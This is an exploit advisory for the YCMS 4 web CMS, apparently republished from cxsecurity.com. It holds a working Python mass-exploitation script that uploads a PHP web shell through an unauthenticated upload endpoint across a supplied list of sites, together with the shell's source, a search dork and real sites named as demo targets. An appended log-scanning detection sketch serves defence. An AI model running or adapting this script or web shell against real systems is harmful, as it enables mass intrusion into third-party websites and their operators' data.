israel YCMS 4 - Remote File Upload - CSRF / Shell Upload

2023.11.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload [-] Author : 1933 (TURK TM - SS CYBER) [-] Vendor : https://website.laki.co.il/ [-] Category : Webapps [-] Dork : intext:נבנה ע"י לק"י בניית אתרים [-] Date : 20/11/2023 [-] Demo Targets : 1-http://barak.ksite.co.il/ 2-https://website.laki.co.il/ 3-https://chanofan.com/ 4-http://www.radio-lev.co.il/ Exploit: import requests import re from colorama import * import os if os.name == 'nt': os.system('cls') else: os.system('clear') init() code_up = """ <!DOCTYPE html> <html> <head> <title>1933-SS</title> <style> body { background-color: black; text-align: center; } h1 { color: red; } .uploaded { color: green; } </style> </head> <body> <h1>1933-ss cyber team</h1> <form enctype='multipart/form-data' action='' method='POST'> <input type='file' name='uploaded_file'></input> <input type='submit' value='Upload'></input> </form> </body> </html> <?php if (!empty($_FILES['uploaded_file'])) { $upload_dir = './'; // Define the directory where you want to save the uploaded files $file_name = basename($_FILES['uploaded_file']['name']); $file_path = $upload_dir . $file_name; if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) { echo '<span class="uploaded">The file ' . $file_name . 
' has been uploaded.</span>'; } else { echo '<h1>There was an error uploading the file, please try again.</h1>'; } } ?> """ banner = Fore.CYAN +""" _____ _____ _______ ______ ______ _____ _______ ______ __ __ / ____/ ____| / ____\ \ / | _ \| ____| __ \ |__ __| ____| /\ | \/ | | (___| (___ | | \ \_/ /| |_) | |__ | |__) | | | | |__ / \ | \ / | \___ \\\___ \ | | \ / | _ <| __| | _ / | | | __| / /\ \ | |\/| | ____) ____) | | |____ | | | |_) | |____| | \ \ | | | |____ / ____ \| | | | |_____|_____/ \_____| |_| |____/|______|_| \_\ |_| |______/_/ \_|_| |_| """ banner2 = "\nCoded by :" + Fore.RED +""" T.ME/D4LGH4CK_TM | T.ME/SS_CYBER_TEAM""" print(banner+banner2+Fore.WHITE) websites = input("\nwebsite list: ") websites = open(websites,"r").read().split("\n") for url in websites: try: value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en" upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*' uploader = {'upload-to-gallery[]': ('ss.php',code_up)} response = requests.post(upload_url, files=uploader , timeout=3) except: pass try: response = requests.get(url+value,timeout=10) if response.status_code == 200: match = re.search(r'/ss(\d+\.php)', response.text) if match: value = match.group(1) print(Fore.GREEN +url+f"uploads/other/ss{value}") else: print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE) except: continue ************************************************** - Telegram : @asad_turk0 - Tnx : RED KURD (@RED_AS_SOCITY) - Thanks to my dear friend "RED KURD" for help to discover the bug.
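Detection sketch for site operators, added here as an example and not part of the original advisory or of YCMS: it scans web-server access logs for the two request shapes the script above relies on, a POST to yadmin/apps/browser.php with op=upload followed by a request for a script under uploads/other/. The combined log format, the extension list, the function name scan and the sample log lines are assumptions of this example.

```python
import re
from collections import defaultdict

# Request shapes come from the exploit on this page; the combined log format
# and the script-extension list are assumptions of this example.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
UPLOAD = re.compile(r'/yadmin/apps/browser\.php\?(?:.*&)?op=upload(?:&|$)', re.I)
SCRIPT = re.compile(r'/uploads/other/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)

def scan(lines):
    """Return (uploads, script_hits, suspects).

    uploads      POSTs to the upload operation that were not rejected (status < 400)
    script_hits  requests for server-side scripts under uploads/other/
    suspects     client IPs that uploaded and then requested such a script
    """
    uploads, script_hits = [], []
    seen = defaultdict(set)
    for n, raw in enumerate(lines, 1):
        m = LINE.match(raw)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, uri, status = m['ip'], m['uri'], int(m['status'])
        if m['method'] == 'POST' and UPLOAD.search(uri) and status < 400:
            uploads.append((n, ip, status))
            seen[ip].add('upload')
        elif SCRIPT.search(uri):
            script_hits.append((n, ip, uri, status))
            if 'upload' in seen[ip]:
                seen[ip].add('exec')
    suspects = sorted(ip for ip, s in seen.items() if {'upload', 'exec'} <= s)
    return uploads, script_hits, suspects

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [20/Nov/2023:10:00:01 +0000] "POST /yadmin/apps/browser.php?op=upload&type=other&id=* HTTP/1.1" 200 12 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [20/Nov/2023:10:00:02 +0000] "GET /yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [20/Nov/2023:10:03:40 +0000] "GET /uploads/other/ss1700474401.php HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [20/Nov/2023:10:04:00 +0000] "GET /uploads/other/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Nov/2023:10:05:00 +0000] "POST /yadmin/apps/browser.php?op=upload&type=other&id=3 HTTP/1.1" 403 0 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    ups, hits, suspects = scan(SAMPLE)
    print("upload POSTs:", ups)
    print("script requests under uploads/other/:", hits)
    print("clients that did both:", suspects)
```

A match in the log is an indicator only; confirm by checking uploads/other/ on disk for script files, and treat any script served from that directory as a finding regardless of which client requested it.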



Copyright 2024, cxsecurity.com

 
